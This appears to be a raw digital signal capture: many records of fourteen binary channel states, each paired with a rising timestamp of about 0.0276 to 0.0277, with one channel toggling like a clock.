1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572380e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572528e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572580e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572780e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572804e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572828e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572852e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572876e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572900e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572928e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7572952e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7572980e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573004e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573076e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573100e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573128e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573152e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573328e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573380e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573528e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573552e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573780e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573928e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7573952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7573980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574028e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574052e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574104e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574180e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574380e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574404e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574428e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574452e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574528e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574552e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574580e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574604e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574676e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574700e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574728e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574752e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574928e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7574952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7574980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575180e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575204e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575504e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575728e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575780e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575924e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7575948e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7575976e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576000e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576124e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576148e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576176e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576200e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576324e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576348e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576376e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576400e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576524e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576548e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576576e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576600e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576724e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,2.7576748e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,2.7576776e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,2.7576780e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,2.7700668e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.7700876e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7700900e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,2.7700928e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7700952e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7701248e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7701268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7701292e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7701316e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7701340e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7701368e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7701392e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7701420e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,2.7701444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,2.7701468e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701500e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701520e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701544e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7701548e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7701568e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701596e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701644e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701668e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701692e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701716e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701744e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701768e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701796e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701820e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701844e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701868e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7701892e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7701916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7701924e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7701944e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7701968e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702044e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,2.7702048e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702052e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702068e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702092e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702116e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702140e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702168e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702196e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702220e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702244e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702252e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702292e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702316e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702344e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702368e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702372e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702392e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702420e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702468e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702492e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702516e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702544e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702568e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702592e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702620e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7702668e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7702692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702700e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702716e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702740e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702768e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702792e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702820e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702844e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702868e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702892e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702940e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7702968e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7702996e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703044e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703092e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703100e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703116e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703144e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703196e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703220e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703244e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703292e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703316e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703340e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703368e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.7703372e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703376e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703468e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703492e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703516e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703540e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703568e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703596e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703620e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703644e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703716e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703724e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7703768e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7703796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703800e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703820e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703844e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703868e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703892e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703940e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7703968e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7703992e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704044e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704092e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704116e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704140e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704168e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704196e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704268e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704292e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704340e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704368e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704392e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704468e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704492e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704516e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704540e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704568e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7704596e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7704644e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7704668e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704676e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704716e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704740e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704768e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704868e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704892e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704916e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704944e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7704968e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7704992e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705020e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705044e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705068e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705072e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705092e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705116e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705168e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705196e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.7705200e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705204e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705268e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705292e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705344e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705368e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705396e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705420e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705444e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705468e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705492e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705544e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705568e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705596e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705620e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7705644e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7705668e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705676e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705692e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705716e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705740e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705768e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705868e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705892e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705916e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705944e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7705968e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7705996e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706020e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706044e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706068e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706072e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706116e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706144e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.7706148e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706152e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706168e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706192e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706268e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706292e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706340e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706368e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706396e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706448e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706468e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706492e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706516e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706544e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706568e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706596e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706620e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706644e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706668e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706692e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.7706744e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.7706768e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.7706776e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.7706796e-02 